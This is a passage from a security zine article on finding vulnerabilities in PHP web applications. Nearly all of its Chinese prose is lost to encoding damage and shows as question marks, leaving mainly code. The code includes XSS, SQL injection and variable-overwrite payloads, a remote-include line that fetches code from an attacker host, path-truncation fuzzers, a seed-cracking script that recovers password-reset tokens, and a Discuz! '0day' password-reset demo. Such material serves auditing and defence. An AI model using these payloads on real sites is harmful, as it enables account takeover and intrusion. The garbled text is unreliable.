|
| |
|
| <![CDATA[<span id="7ztzv"></span>]]><![CDATA[<form id="7ztzv"></form>]]> | | |
|
<![CDATA[<span id="7ztzv"></span>]]> |
|
|
|
|
<![CDATA[<address id="7ztzv"></address>]]>
| |
==Ph4nt0m Security Team==
Issue 0x03, Phile #0x06 of 0x07
|=---------------------------------------------------------------------------=|
|=---------------------=[ ???PHP??ó???????????? ]=---------------------=|
|=---------------------------------------------------------------------------=|
|=---------------------------------------------------------------------------=|
|=----------------------=[ By www.80vul.com ]=------------------------=|
|=------------------------=[ <www.80vul.com> ]=--------------------------=|
|=---------------------------------------------------------------------------=|
[??]
1. ???
2. ??????????????
3. PHP?汾???????????
4. ?????????????????????
5. ???????????
5.1 ?????????key
5.2 ????????
5.2.1 ?????????????
5.2.2 parse_str()???????????
5.2.3 import_request_variables()???????????
5.2.4 PHP5 Globals
5.3 magic_quotes_gpc??????
5.3.1 ????magic_quotes_gpc
5.3.2 ??Щ?????????????????
5.3.3 ??????????????
5.3.4 ???ι???
5.3.5 ?????????????μ???????
5.3.6 ????key?????????
5.4 ???????
5.4.1 PHP?п?????′??????????
5.4.2 ???????????????
5.5 PHP???????????????
5.5.1 PHP????????????
5.5.2 PHP?????????????
5.5.3 session_destroy()?????????
5.5.4 ???????
5.6 ???????
5.6.1 ???
5.6.1.1 include???
5.6.1.2 ??????
5.6.1.3 ?????????????????
6. ????????????μ????
7. DEMO
8. ??
9. ???
??????
PHP????????????????????????????web?????????п??????????????????
?????????????????г???34%???????php??????????Yahoo??sina??163??sohu?????
???????????????????web???????????bbs,blog,wiki,cms???????????php???????
Discuz??phpwind??phpbb??vbb??wordpress??boblog????????web??????????????php?
?ó??????????????????????????????????????????????????????
?ó????????????????????????????????????ó??????????????????????????
??????????д????????????????????????????????????????????????????
?????????????棺???????????????????????Щ??????????????????????Щ
??????????????????????????????????????????????????n???????к?
?????????е???????е????????????????????????????????????????
?о??????????????????????μ????????μ???????????????????Щ?????????
???????????
??????????????????±????????????????????????????????????????????
?????????л?????????
??????????????????
WEB??ó?????????????????Χ????????????????????????????????????????
????????????????????????????n?α??????????????????????????У??????
MS??侭?????????????????????к????????仰?????????????????????????
?????????gpc[$_GET,$_POST,$_COOKIE]??????????????????????n???仯??????
??????????????????????????仰???????′??????????н?????????????к??????
PHP??????????????????????????????????????????????????????????????
????????Σ??????????????grep??findstr?????????????????????????????????????
????Щ???????????о??Щ?????????????????????????????????????????????е?
??????????????????????????????????????Щ?????????????????
??????????У???????PHP????????????????????????hookΣ???????????????
??????????????????Щ??????????????????????
????PHP?汾???????????
????????PHP?????3???汾??php4??php5??php6???????????????£?
php4 68%
2000-2007??No security fixes after 2008/08??????汾??php4.4.9
php5 32%
2004-present??Now at version 5.2.6??PHP 5.3 alpha1 released!??
php6
??????????Σ??仯?????????????????????????????magic_quotes_gpc??
??????????????????Χ??
????php??????????????????????PHP?汾???棬????o??????????б??????
??Щ????????????????????WEB??ó??????????????????????????????????
????????????????????????
???????????????????????????????????????????塱???????????????????
?й?????????????????????PHP?汾????????????????в??????????????????????
win/*nix????WEB???????????????iis/apache?????????????????????????????????
??WEB SERVER?????????????????????????Щ??????漰??
??????????????????WEB??????????????????????????????WEB??????????
PHP?汾???????
?塢???????????
???潫????????Щ????PHP??????????Щ???????????ü??ɡ?
5.1 ?????????key
????????????????????????GET/POST/COOKIE?????????????????????????е?
?????????????key?????????????????????
--code-------------------------------------------------------------------------
<?php
//key.php?aaaa"aaa=1&bb"b=2
//print_R($_GET);
foreach ($_GET AS $key => $value)
{
print $key."\n";
}
?>
-------------------------------------------------------------------------------
??????????????????????key??????????????????????????????????URL??
--code-------------------------------------------------------------------------
key.php?<script>alert(1);</script>=1&bbb=2
-------------------------------------------------------------------------------
???????????xss???????????????????key????include()?????????sql???
???????
+++++++++++++++++++++++++
?????????
-------------------------
PHP?汾?????
???????
??????????????
+++++++++++++++++++++++++
5.2 ?????????variable-overwrite??
?????????????????extract()?????????????????EXTR_OVERWRITE????????
????????????±??????????????к????????????±?????????磺
5.2.1 ?????????????
?????′???
--code-------------------------------------------------------------------------
<?php
//var.php?a=fuck
$a="hi";
foreach($_GET as $key => $value) {
$$key = $value;
}
print $a;
?>
-------------------------------------------------------------------------------
????WEB?????????????????????????????foreach??????Discuz!4.1??WAP????
?????
--code-------------------------------------------------------------------------
$chs = "";
if($_POST && $charset != "utf-8") {
$chs = new Chinese("UTF-8", $charset);
foreach($_POST as $key => $value) {
$$key = $chs->Convert($value);
}
unset($chs);
-------------------------------------------------------------------------------
+++++++++++++++++++++++++
?????????
-------------------------
PHP?汾?????
???????
??????????????
+++++++++++++++++++++++++
5.2.2 parse_str()?????????????CVE-2007-3205????mb_parse_str()
--code-------------------------------------------------------------------------
//var.php?var=new
$var = "init";
parse_str($_SERVER["QUERY_STRING"]);
print $var;
-------------------------------------------------------------------------------
?ú???????????????????????????????????$_SERVER["QUERY_STRING"]???????
??????????????????????????????????=?????????????????????
--code-------------------------------------------------------------------------
//var.php?var=1&a[1]=var1%3d222
$var1 = "init";
parse_str($a[$_GET["var"]]);
print $var1;
-------------------------------------------------------------------------------
?????????????$var??????$var1??????
+++++++++++++++++++++++++
??????????parse_str??
-------------------------
PHP?汾?????
???????
??????????????parse_str
+++++++++++++++++++++++++
+++++++++++++++++++++++++
??????????mb_parse_str??
-------------------------
PHP?汾???php4<4.4.7 php5<5.2.2
???????
??????????????mb_parse_str
+++++++++++++++++++++++++
5.2.3 import_request_variables()?????????????CVE-2007-1396??
--code-------------------------------------------------------------------------
//var.php?_SERVER[REMOTE_ADDR]=10.1.1.1
echo "GLOBALS ".(int)ini_get("register_globals")."n";
import_request_variables("GPC");
if ($_SERVER["REMOTE_ADDR"] != "10.1.1.1") die("Go away!");
echo "Hello admin!";
-------------------------------------------------------------------------------
+++++++++++++++++++++++++
??????????import_request_variables??
-------------------------
PHP?汾???php4<4.4.1 php5<5.2.2
???????
??????????????import_request_variables
+++++++++++++++++++++++++
5.2.4 PHP5 Globals
???????????????????????????PHP?????????????????????????????
--code-------------------------------------------------------------------------
<?
// register_globals =ON
//foo.php?GLOBALS[foobar]=HELLO
php echo $foobar;
?>
-------------------------------------------------------------------------------
????????????п????????????′???
--code-------------------------------------------------------------------------
//??????????????
//var.php?GLOBALS[a]=aaaa&b=111
if (ini_get("register_globals")) foreach($_REQUEST as $k=>$v) unset(${$k});
print $a;
print $_GET[b];
-------------------------------------------------------------------------------
??????WEB2.0????????????????????????????????????????????????crsf
??????
+++++++++++++++++++++++++
?????????
-------------------------
PHP?汾?????
???????
??????????????
+++++++++++++++++++++++++
5.3 magic_quotes_gpc??????
5.3.1 ????magic_quotes_gpc
??????????е? "???????????"??????????\????б????? NULL ?????????????????
??б???????塣???к??????????????? ?磺addslashes()??mysql_escape_string()??
mysql_real_escape_string()?????????parse_str()?????????magic_quotes_gpc???
??????????????????????????????????????????????????Щ?????????
???????????????????????????????????????Щ??????????????????????????
??????????????????????????????????? ????
5.3.2 ??Щ?????????????????
1) $_SERVER????
PHP5??$_SERVER???????magic_quotes_gpc????????????????X-Forwarded-For?????
??????????????????????X-Forwarded-For??????????????????
+++++++++++++++++++++++++
??????????$_SERVER??????
-------------------------
PHP?汾?????
???????
??????????????_SERVER
+++++++++++++++++++++++++
2) getenv()?????????????????$_SERVER??????
+++++++++++++++++++++++++
??????????getenv()??
-------------------------
PHP?汾?????
???????
??????????????getenv
+++++++++++++++++++++++++
3) $HTTP_RAW_POST_DATA??PHP?????????
????????soap/xmlrpc/webpublish???????????′???
--code-------------------------------------------------------------------------
if ( !isset( $HTTP_RAW_POST_DATA ) ) {
$HTTP_RAW_POST_DATA = file_get_contents( "php://input" );
}
if ( isset($HTTP_RAW_POST_DATA) )
$HTTP_RAW_POST_DATA = trim($HTTP_RAW_POST_DATA);
-------------------------------------------------------------------------------
+++++++++++++++++++++++++
??????????????????
-------------------------
PHP?汾?????
???????
??????????????HTTP_RAW_POST_DATA????php://input
+++++++++++++++++++++++++
4) ????????????????"?????磺in()/limit/order by/group by
??Discuz!<5.0??pm.php??
--code-------------------------------------------------------------------------
if(is_array($msgtobuddys)) {
$msgto = array_merge($msgtobuddys, array($msgtoid));
......
foreach($msgto as $uid) {
$uids .= $comma.$uid;
$comma = ",";
}
......
$query = $db->query("SELECT m.username, mf.ignorepm FROM {$tablepre}members m
LEFT JOIN {$tablepre}memberfields mf USING(uid)
WHERE m.uid IN ($uids)");
-------------------------------------------------------------------------------
+++++++++++++++++++++++++
?????????
-------------------------
PHP?汾?????
???????
????????????????????????select,update,insert????
+++++++++++++++++++++++++
5.3.3 ??????????????
???WEB???????????????????????????????????????????????????
????????????????????????
????????????????У?
1) stripslashes() ?????????????decode-addslashes()
2) ??????????????????
base64_decode -- ????? MIME base64 ???????????н???
base64_encode -- ??? MIME base64 ????????б???
rawurldecode -- ???????? URL ????????н???
rawurlencode -- ???? RFC 1738 ?? URL ???б???
urldecode -- ?????????? URL ?????
urlencode -- ???? URL ?????
......
????????? unserialize/serialize??
3) ???????????GKB,UTF7/8...????iconv()/mb_convert_encoding()??
??????????????????????????????????????urldecode??
--code-------------------------------------------------------------------------
$sql = "SELECT * FROM article WHERE articleid="".urldecode($_GET[id]).""";
-------------------------------------------------------------------------------
??magic_quotes_gpc=on??????????id=%2527?????sql??????
--code-------------------------------------------------------------------------
SELECT * FROM article WHERE articleid="""
-------------------------------------------------------------------------------
+++++++++++++++++++++++++
?????????
-------------------------
PHP?汾?????
???????
????????????????????
+++++++++++++++++++++++++
5.3.4 ???ι?????????????[1]??
1) ???????????????н??й???
2) ?????????????
* mysql/oracle???????????\????????"??????????仯?\"????????update??????
??????????????"??
* mssql?????????"????????????"??????????仯?\"??mssql??????????????
???????????????????????mssql?????????κ????壩
?????????????????????????????н???????????????к??????????????ι???
?????????????webrootkit??????????????????????????????????????????
???????vul??
+++++++++++++++++++++++++
?????????
-------------------------
PHP?汾?????
???????
??????????????
+++++++++++++++++++++++++
5.3.5 ?????????????μ???????
??????????????????????????
[\-->\\,"-->\","-->\",null-->\0]
????????????????????????????\??????\??????????????????????WIN???????
???????????????????????php??ó???????????????????????
1) ?????????",\,",null]??
--code-------------------------------------------------------------------------
$order_sn=substr($_GET["order_sn"], 1);
//?? "
//?????????? \"
//substr "
$sql = "SELECT order_id, order_status, shipping_status, pay_status, ".
" shipping_time, shipping_id, invoice_no, user_id ".
" FROM " . $ecs->table("order_info").
" WHERE order_sn = "$order_sn" LIMIT 1";
-------------------------------------------------------------------------------
2) ?????\?????
--code-------------------------------------------------------------------------
$order_sn=substr($_GET["order_sn"], 0,1);
//?? "
//?????????? \"
//substr \
$sql = "SELECT order_id, order_status, shipping_status, pay_status, ".
" shipping_time, shipping_id, invoice_no, user_id ".
" FROM " . $ecs->table("order_info").
" WHERE order_sn = "$order_sn" and order_tn="".$_GET["order_tn"].""";
-------------------------------------------------------------------------------
???????
--code-------------------------------------------------------------------------
?order_sn="&order_tn=%20and%201=1/*
-------------------------------------------------------------------------------
??е?SQL??????
--code-------------------------------------------------------------------------
SELECT order_id, order_status, shipping_status, pay_status, shipping_time,
shipping_id, invoice_no, user_id FROM order_info WHERE order_sn = "\" and
order_tn=" and 1=1/*"
-------------------------------------------------------------------------------
+++++++++++++++++++++++++
?????????
-------------------------
PHP?汾?????
???????
?????????????????????????substr???????????
+++++++++++++++++++++++++
5.3.6 ????key?????????
?????????????????????????key??PHP??????????????????????
--code-------------------------------------------------------------------------
<?php
//key.php?aaaa"aaa=1&bb"b=2
//print_R($_GET);
foreach ($_GET AS $key => $value)
{
print $key."\n";
}
?>
-------------------------------------------------------------------------------
1) ??magic_quotes_gpc = On?????php5.24?2????????
aaaa\"aaa
bb\"b
???????????????????????????magic_quotes_gpc = On?£?????key????????????
??????php4??php<5.2.1??汾?У????????????????????key????????????£?
--code-------------------------------------------------------------------------
<?php
//key.php?aaaa"aaa[bb"]=1
print_R($_GET);
?>
-------------------------------------------------------------------------------
??????:
Array ( [aaaa"aaa] => Array ( [bb\"] => 1 ) )
?????????????key???????????????
+++++++++++++++++++++++++
?????????
-------------------------
PHP?汾???php4??php<5.2.1
???????
??????????????
+++++++++++++++++++++++++
2) ??magic_quotes_gpc = Off?????php5.24?2????????
aaaa"aaa
bb"b
????magic_quotes_gpc = Off????е??????????????????????????????????
addslashes?????????????????????????????????????£?
--code-------------------------------------------------------------------------
<?php
//keyvul.php?aaa"aa=1"
//magic_quotes_gpc = Off
if (!get_magic_quotes_gpc())
{
$_GET = addslashes_array($_GET);
}
function addslashes_array($value)
{
return is_array($value) ? array_map("addslashes_array", $value) : addslashes($value);
}
print_R($_GET);
foreach ($_GET AS $key => $value)
{
print $key;
}
?>
-------------------------------------------------------------------------------
??????????????????????????????????addslashes($value)???????????????
???????????д???????????key???????????????????£?
Array
(
[aaa"aa] => 1\"
)
aaa"aa
+++++++++++++++++++++++++
?????????
-------------------------
PHP?汾?????
???????
??????????????
+++++++++++++++++++++++++
5.4 ???????
5.4.1 PHP?п?????′??????????
?????????eval??preg_replace+/e??????д???????????php???к????????
????д????磺
assert()
call_user_func()
call_user_func_array()
create_function()
????????
...
??????????????????????????create_function()???????????????
--code-------------------------------------------------------------------------
<?php
//how to exp this code
$sort_by=$_GET["sort_by"];
$sorter="strnatcasecmp";
$databases=array("test","test");
$sort_function = " return 1 * " . $sorter . "($a["" . $sort_by . ""], $b["" . $sort_by . ""]);
";
usort($databases, create_function("$a, $b", $sort_function));
-------------------------------------------------------------------------------
+++++++++++++++++++++++++
?????????
-------------------------
PHP?汾?????
???????
???????????????????assert,call_user_func,call_user_func_array,create_function???
+++++++++++++++++++++++++
5.4.2 ???????????????
?????????????????????????????????????????
--code-------------------------------------------------------------------------
echo "$a\n";
echo "$a\n";
-------------------------------------------------------------------------------
??????????′???
--code-------------------------------------------------------------------------
//how to exp this code
if($globals["bbc_email"]){
$text = preg_replace(
array("/\[email=(.*?)\](.*?)\[\/email\]/ies",
"/\[email\](.*?)\[\/email\]/ies"),
array("check_email("$1", "$2")",
"check_email("$1", "$1")"), $text);
-------------------------------------------------------------------------------
?????????ó??????????""???????????????config????data???????????
???????????????????
+++++++++++++++++++++++++
?????????
-------------------------
PHP?汾?????
???????
??????????????
+++++++++++++++++++++++++
5.5 PHP???????????????
5.5.1 PHP????????????
???????Stefan Esser?????Month of PHP Bugs??MOPB?????[2]???????????б??
???????????unserialize()?????????£?
--code-------------------------------------------------------------------------
unserialize(stripslashes($HTTP_COOKIE_VARS[$cookiename . "_data"]);
-------------------------------------------------------------------------------
????????PHP?汾?????????????????????????????????????????ó????????
????????????????????PHP?汾?????
+++++++++++++++++++++++++
?????????
-------------------------
PHP?汾??????fix??汾
?????
???????????????????
+++++++++++++++++++++++++
5.5.2 PHP?????????????
Stefan Esser?????????????unset()--Zend_Hash_Del_Key_Or_Index Vulnerability
????phpwind?????serarch.php??????
--code-------------------------------------------------------------------------
unset($uids);
......
$query=$db->query("SELECT uid FROM pw_members WHERE username LIKE "$pwuser"");
while($member=$db->fetch_array($query)){
$uids .= $member["uid"].",";
}
$uids ? $uids=substr($uids,0,-1) : $sqlwhere.=" AND 0 ";
........
$query = $db->query("SELECT DISTINCT t.tid FROM $sqltable WHERE $sqlwhere $orderby $limit");
-------------------------------------------------------------------------------
+++++++++++++++++++++++++
?????????
-------------------------
PHP?汾???php4<4.3 php5<5.14
???????
???????????unset
+++++++++++++++++++++++++
5.5.3 session_destroy()???????????????PHP?汾??5.1.2??
????????????????saiy??????session_destroy()??????????????session?????
???web??ó????logout??????????????????????session????????????????Щ??
??汾????????????????????????????????????£?
--code-------------------------------------------------------------------------
<?php
//val.php
session_save_path("./");
session_start();
if($_GET["del"]) {
session_unset();
session_destroy();
}else{
$_SESSION["hei"]=1;
echo(session_id());
print_r($_SESSION);
}
?>
-------------------------------------------------------------------------------
????????????cookie:PHPSESSID=/../1.php??????unlink("sess_/../1.php")????
????????../???????????????????????????????Щ?汾?????????phpmyadmin??
sablog??phpwind3????
+++++++++++++++++++++++++
?????????
-------------------------
PHP?汾??????岻??
???????
???????????session_destroy
+++++++++++++++++++++++++
5.5.4 ???????
1) rand() VS mt_rand()
--code-------------------------------------------------------------------------
<?php
//on windows
print mt_getrandmax(); //2147483647
print getrandmax();// 32767
?>
-------------------------------------------------------------------------------
???????rand()???????????32767??????????????????????
--code-------------------------------------------------------------------------
<?php
$a= md5(rand());
for($i=0;$i<=32767;$i++){
if(md5($i) ==$a ) {
print $i."-->ok!!<br>";exit;
}else { print $i."<br>";}
}
?>
-------------------------------------------------------------------------------
?????????????rand????session????????????????????????session?????????
mt_rand????????????????
+++++++++++++++++++++++++
?????????
-------------------------
PHP?汾?????
???????
???????????rand
+++++++++++++++++++++++++
2) mt_srand()/srand()-weak seeding??by Stefan Esser??
??php????????????
-------------------------------------------------------------------------------
mt_srand
(PHP 3 >= 3.0.6, PHP 4, PHP 5)
mt_srand -- ???????????????????????????
???
void mt_srand ( int seed )
?? seed ?????????????????????? PHP 4.2.0 ?濪???seed ?????????????????????
???????????????
???? 1. mt_srand() ????
<?php
// seed with microseconds
function make_seed()
{
list($usec, $sec) = explode(" ", microtime());
return (float) $sec + ((float) $usec * 100000);
}
mt_srand(make_seed());
$randval = mt_rand();
?>
?: ?? PHP 4.2.0 ??????????? srand() ?? mt_srand() ??????????????????????????
?????ɡ?
-------------------------------------------------------------------------------
php??4.2.0????????????????????????????????????????????????????
--code-------------------------------------------------------------------------
mt_srand ((double) microtime() * 1000000)
-------------------------------------------------------------------------------
???????(double)microtime()*1000000????????seed??????????
0<(double) microtime()<1 ---> 0<(double) microtime()* 1000000<1000000
???????????????,??????????£?
--code-------------------------------------------------------------------------
<?php
/////////////////
//>php rand.php
//828682
//828682
////////////////
ini_set("max_execution_time",0);
$time=(double) microtime()* 1000000;
print $time."\n";
mt_srand ($time);
$search_id = mt_rand();
$seed = search_seed($search_id);
print $seed;
function search_seed($rand_num) {
$max = 1000000;
for($seed=0;$seed<=$max;$seed++){
mt_srand($seed);
$key = mt_rand();
if($key==$rand_num) return $seed;
}
return false;
}
?>
-------------------------------------------------------------------------------
????????????????seed????????????Stefan Esser?????seed?????????仯
???仯?????仰??????????????seed???????? ???????seed???mt_rand???????
?????????????
+--------------+
| seed-A |
+--------------+
| mt_rand-A-1 |
| mt_rand-A-2 |
| mt_rand-A-3 |
+--------------+
+--------------+
| seed-B |
+--------------+
| mt_rand-B-1 |
| mt_rand-B-2 |
| mt_rand-B-3 |
+--------------+
????seed-A??mt_rand-1/2/3?????????????????????????????????seed-A????
seed-B?????mt_rand-A-1?????mt_rand-B-1????????????????????seed??????????
mt_rand??????
????5.2.6>php>4.2.0??????????????????????????????????????????
?????????????????????????????????????
??????"Cross Application Attacks"??????·??Stefan Esser?????????????????????
?????????????????mt_srand ((double) microtime()* 1000000)????phpbb+wordpree??
????????????Σ??.
??????5.2.6>php>4.2.0????????????????????????Stefan Esser???????????????
-------------------------------------------------------------------------------
The Implementation
When mt_rand() is seeded internally or by a call to mt_srand() PHP 4 and PHP 5
<= 5.2.0 force the lowest bit to 1. Therefore the strength of the seed is only
31 and not 32 bits. In PHP 5.2.1 and above the implementation of the Mersenne
Twister was changed and the forced bit removed.
-------------------------------------------------------------------------------
??32λ???????????????????????2^32????????????????2^32?ξ???????
seed??????PHP 4??PHP 5 <= 5.2.0 ?????и?bug??????????????????????????????
[3]??,??????????£?
--code-------------------------------------------------------------------------
<?php
mt_srand(4);
$a = mt_rand();
mt_srand(5);
$b = mt_rand();
print $a."\n".$b;
?>
-------------------------------------------------------------------------------
?????????????$a==$b???????????????????2^32/2=2^31?Ρ?????????′???
--code-------------------------------------------------------------------------
<?php
//base on http://www.milw0rm.com/exploits/6421
//test on php 5.2.0
define("BUGGY", 1); //???????$a==$b?????BUGGY=1
$key = wp_generate_password(20, false);
echo $key."\n";
$seed = getseed($key);
print $seed."\n";
mt_srand($seed);
$pass = wp_generate_password(20, false);
echo $pass."\n";
function wp_generate_password($length = 12, $special_chars = true) {
$chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
if ( $special_chars )
$chars .= "!@#$%^&*()";
$password = "";
for ( $i = 0; $i < $length; $i++ )
$password .= substr($chars, mt_rand(0, strlen($chars) - 1), 1);
return $password;
}
function getseed($resetkey) {
$max = pow(2,(32-BUGGY));
for($x=0;$x<=$max;$x++) {
$seed = BUGGY ? ($x << 1) + 1 : $x;
mt_srand($seed);
$testkey = wp_generate_password(20,false);
if($testkey==$resetkey) { echo "o\n"; return $seed; }
if(!($x % 10000)) echo $x / 10000;
}
echo "\n";
return false;
}
?>
-------------------------------------------------------------------------------
???н?????£?
-------------------------------------------------------------------------------
php5>php rand.php
M8pzpjwCrvVt3oobAaOr
0123456789101112131415161718192021222324252627282930313233343536373839404142434
445464748495051525354555657585960616263646566676869
7071727374757677787980818283848586878889909192939495969798991001011021031041051
061071081091101111121131141151161171181191201211221
2312412512612712812913013113213313413513613713813914014114214314414514614714814
915015115215315415515615715815916016116216316416516
6167168169170171172173174175176177178179180181182183184185186187188189190191192
193194195196197198199200201202203204205206207208209
2102112122132142152162172182192202212222232242252262272282292302312322332342352
362372382392402412422432442452462472482492502512522
..............01062110622106231062410625106261062710628106291063010631106321063
3o
70693
pjwCrvVt3oobAaOr
-------------------------------------------------------------------------------
??10634?????????????????
??PHP?汾????5.2.1??????????????????????????????????????????????
??php5.2.0???????????????mt_rand()?????????????磺
--code-------------------------------------------------------------------------
<?php
mt_srand(42);
echo mt_rand();
//php<=5.20 1387371436
//php>5.20 1354439493
?>
-------------------------------------------------------------------------------
?????????????????????exp?????л??????????>5.20???????exp???е?????
???>5.20??汾????????????????
?????????????????????php<5.26????????ж??岥???mt_rand???????????????
??????web??????????mt_rand???????????session???????????????????????
????????????????????????????????
????????????????????????????wordpress??phpbb??punbb????????????????
???????1?????????bbs????Discuz!??mt_srand???μ??????
+++++++++++++++++++++++++
?????????
-------------------------
PHP?汾???php4 php5<5.2.6
???????
???????????mt_srand/mt_rand
+++++++++++++++++++++++++
5.6 ???????
????????????????????????????壬????????Щcode hacking????????????????
????????????????????????
5.6.1 ???
???????????????????????null???????
5.6.1.1 include???
--code-------------------------------------------------------------------------
<?php
include $_GET["action"].".php";
?>
-------------------------------------------------------------------------------
????action=/etc/passwd%00???е??%00????????????.php????????????%00?????????
???????????????????????????????????????????url?????????????????????
??action=http://www.hacksite.com/evil-code.txt????????????????α?????????????????
???????????????????????д??????fuzz??£?
--code-------------------------------------------------------------------------
<?php
////////////////////
////var5.php????:
////include $_GET["action"].".php";
////print strlen(realpath("./"))+strlen($_GET["action"]);
///////////////////
ini_set("max_execution_time", 0);
$str="";
for($i=0;$i<50000;$i++)
{
$str=$str."/";
$resp=file_get_contents("http://127.0.0.1/var/var5.php?action=1.txt".$str);
//1.txt???????print "hi";
if (strpos($resp, "hi") !== false){
print $i;
exit;
}
}
?>
-------------------------------------------------------------------------------
?????????????.?????? /??????2??????????????????????????????win????*nix
????????????????win??strlen(realpath("./"))+strlen($_GET["action"])????????
256???????????*nix???????4 * 1024 = 4096??????php.ini???????????????????
???????????????????????????????????????cloie#ph4nt0m.org???????]??
5.6.1.2 ??????
??????web???????????????????????????????????????????????
?ó????????????username????????????е?username??????????????????????
??????????????????????????????Щ?ж???????????????????????2????????
???
1) Mysql SQL Column Truncation Vulnerabilities
????????????Stefan Esser??????Stefan Esser????????:)?????????????mysql
??sql_mode?????default?????????п???STRICT_ALL_TABLES??????MySQL???????
???????????warning????????error???????error????????????????????????Щ??
?????????????£?
--code-------------------------------------------------------------------------
mysql> insert into truncated_test(`username`,`password`) values("admin","pass");
mysql> insert into truncated_test(`username`,`password`) values("admin x", "new_pass");
Query OK, 1 row affected, 1 warning (0.01 sec)
mysql> select * from truncated_test;
+----+------------+----------+
| id | username | password |
+----+------------+----------+
| 1 | admin | pass |
| 2 | admin | new_pass |
+----+------------+----------+
2 rows in set (0.00 sec)
-------------------------------------------------------------------------------
2) Mysql charset Truncation vulnerability
????????80sec????????mysql????????洢????utf8??????????Щ???????????
???????????£?
--code-------------------------------------------------------------------------
mysql> insert into truncated_test(`username`,`password`) values(concat("admin",0xc1), "new_pass2");
Query OK, 1 row affected, 1 warning (0.00 sec)
mysql> select * from truncated_test;
+----+------------+----------+
| id | username | password |
+----+------------+----------+
| 1 | admin | pass |
| 2 | admin | new_pass |
| 3 | admin | new_pass2 |
+----+------------+----------+
2 rows in set (0.00 sec)
-------------------------------------------------------------------------------
????web??ó?????п??????Щ?????????????洢???????????????????
????????′???
--code-------------------------------------------------------------------------
$result = mysql_query("SELECT * from test_user where user="$user" ");
....
if(@mysql_fetch_array($result, MYSQL_NUM)) {
die("already exist");
}
-------------------------------------------------------------------------------
+++++++++++++++++++++++++
?????????
-------------------------
PHP?汾?????
???????
??????????????
+++++++++++++++++++++++++
5.6.1.3 ?????????????????
??????????к????????????????????????????web??ó?????????????Щ??
???????°????????????????????windows????????????????.????????????
???????????????????д?????????????дwebshell?????????windows?????.\..\??
?????????????
???滹?????????????????????????
--code-------------------------------------------------------------------------
//Is this code vul?
if( eregi(".php",$url) ){
die("ERR");
}
$fileurl=str_replace($webdb[www_url],"",$url);
.....
header("Content-Disposition: attachment; filename=".$filename);
-------------------------------------------------------------------------------
?????????????????????????????????????á?.php?????????????????????
??str_replace?滻$webdb[www_url]???????????????.p$webdb[www_url]hp??????????
????????????????fix???????????????′???
--code-------------------------------------------------------------------------
$fileurl=str_replace($webdb[www_url],"",$url);
if( eregi(".php",$url) ){
die("ERR");
}
-------------------------------------------------------------------------------
str_replace????????????????????str_replace???????????????????????
????????????????Щ??????????????????????????????????????
--code-------------------------------------------------------------------------
<?php
for($i=0;$i<255;$i++) {
$url = "1.ph".chr($i);
$tmp = @file_get_contents($url);
if(!empty($tmp)) echo chr($i)."\r\n";
}
?>
-------------------------------------------------------------------------------
??????windows???????????????????????* < > ? P p??????????μ?1.php??
+++++++++++++++++++++++++
?????????
-------------------------
PHP?汾?????
???????
?????????????????????
+++++++++++++++++++++++++
????????????????μ????
?????????о??????????????????????????????????????????????????
??????μ??????????÷?????
* ???????????????????????exp?????????????????
* ?????php???????????,?????μ???Σ??????????????÷????
* fuzz php???????????μ???????????????????????????????????μ?4.6?????
??????????fuzz???????????????
* ????php??????????μ?????????????????????????????????????????Щ???????
?????????????php??????????????????????????μ??????????php?????????
??????3??????????????????????????μ????????????????????????????????????
????????Щ?????php???????????
* ??????????????????????????????????Щ???ù???????????????????
???????
* ?????????????? ????
???DEMO
* DEMO -- Discuz! Reset User Password 0day Vulnerability ????
??Exp:http://www.80vul.com/dzvul/sodb/14/sodb-2008-14.txt??
PHP?汾???:php4 php5<5.2.6
?????: ??
??????:????mt_srand/mt_rand
????? ???Discuz! 6.1??????grep????mt_srand?????
-------------------------------------------------------------------------------
heige@heige-desktop:~/dz6/upload$ grep -in "mt_srand" -r ./ --colour -5
./include/global.func.php-694- $GLOBALS["rewritecompatible"] && $name = rawurlencode($name);
./include/global.func.php-695- return "<a href="tag-".$name.".html"".stripslashes($extra).">";
./include/global.func.php-696-}
./include/global.func.php-697-
./include/global.func.php-698-function random($length, $numeric = 0) {
./include/global.func.php:699: PHP_VERSION < "4.2.0" && mt_srand((double)microtime() * 1000000);
./include/global.func.php-700- if($numeric) {
./include/global.func.php-701- $hash = sprintf("%0".$length."d", mt_rand(0, pow(10, $length) - 1));
./include/global.func.php-702- } else {
./include/global.func.php-703- $hash = "";
./include/global.func.php-704- $chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz";
--
./include/discuzcode.func.php-30-
./include/discuzcode.func.php-31-if(!isset($_DCACHE["bbcodes"]) || !is_array($_DCACHE["bbcodes"]) || !is_array($_DCACHE["smilies"])) {
./include/discuzcode.func.php-32- @include DISCUZ_ROOT."./forumdata/cache/cache_bbcodes.php";
./include/discuzcode.func.php-33-}
./include/discuzcode.func.php-34-
./include/discuzcode.func.php:35:mt_srand((double)microtime() * 1000000);
./include/discuzcode.func.php-36-
./include/discuzcode.func.php-37-function attachtag($pid, $aid, &$postlist) {
./include/discuzcode.func.php-38- global $attachrefcheck, $thumbstatus, $extcredits, $creditstrans, $ftp, $exthtml;
./include/discuzcode.func.php-39- $attach = $postlist[$pid]["attachments"][$aid];
./include/discuzcode.func.php-40- if($attach["attachimg"]) {
-------------------------------------------------------------------------------
??????????????mt_srand()????1????./include/global.func.php?????????random()??
--code-------------------------------------------------------------------------
PHP_VERSION < "4.2.0" && mt_srand((double)microtime() * 1000000);
-------------------------------------------------------------------------------
?ж???汾???????PHP_VERSION > "4.2.0"???php???????????????????????
???????????ó????????php?????????????????????????
1) "Cross Application Attacks" ????·???????????????????????????????
mt_srand((double)microtime() * 1000000)?????????????п????????????dz??????
?Cross Application??????????????????????????????????2???????
--code-------------------------------------------------------------------------
./include/discuzcode.func.php:35:mt_srand((double)microtime() * 1000000);
-------------------------------------------------------------------------------
??????????dz?????????????????????????exp????????????????????exp????
?????????????????????????]??
2) ?е????????????mt_srand((double)microtime() * 1000000);???????壬???dz??
?????????????????????????????????????????????????ó?????ж??壬??β?
????"Cross Application Attacks"??5.2.6>php>4.2.0 php????????????????????
????????????????????п????????????????????????
?????
??????80vul??????????80vul-A??80vul-B??80vul-C?????????????????80vul-B??
????????·?????????????л????????????????Щ????????????????????????
??б???????????д???ο????????????????????????????????????????????????
??????????о?????????????????google???????????д????????????????????
???????ó????0day???????????????????????????????????????????????????
??????????????檔????????????????????????????Щ?????????????????????????
??????Щ??ó????0day??????????????????????????????лл??????
??????
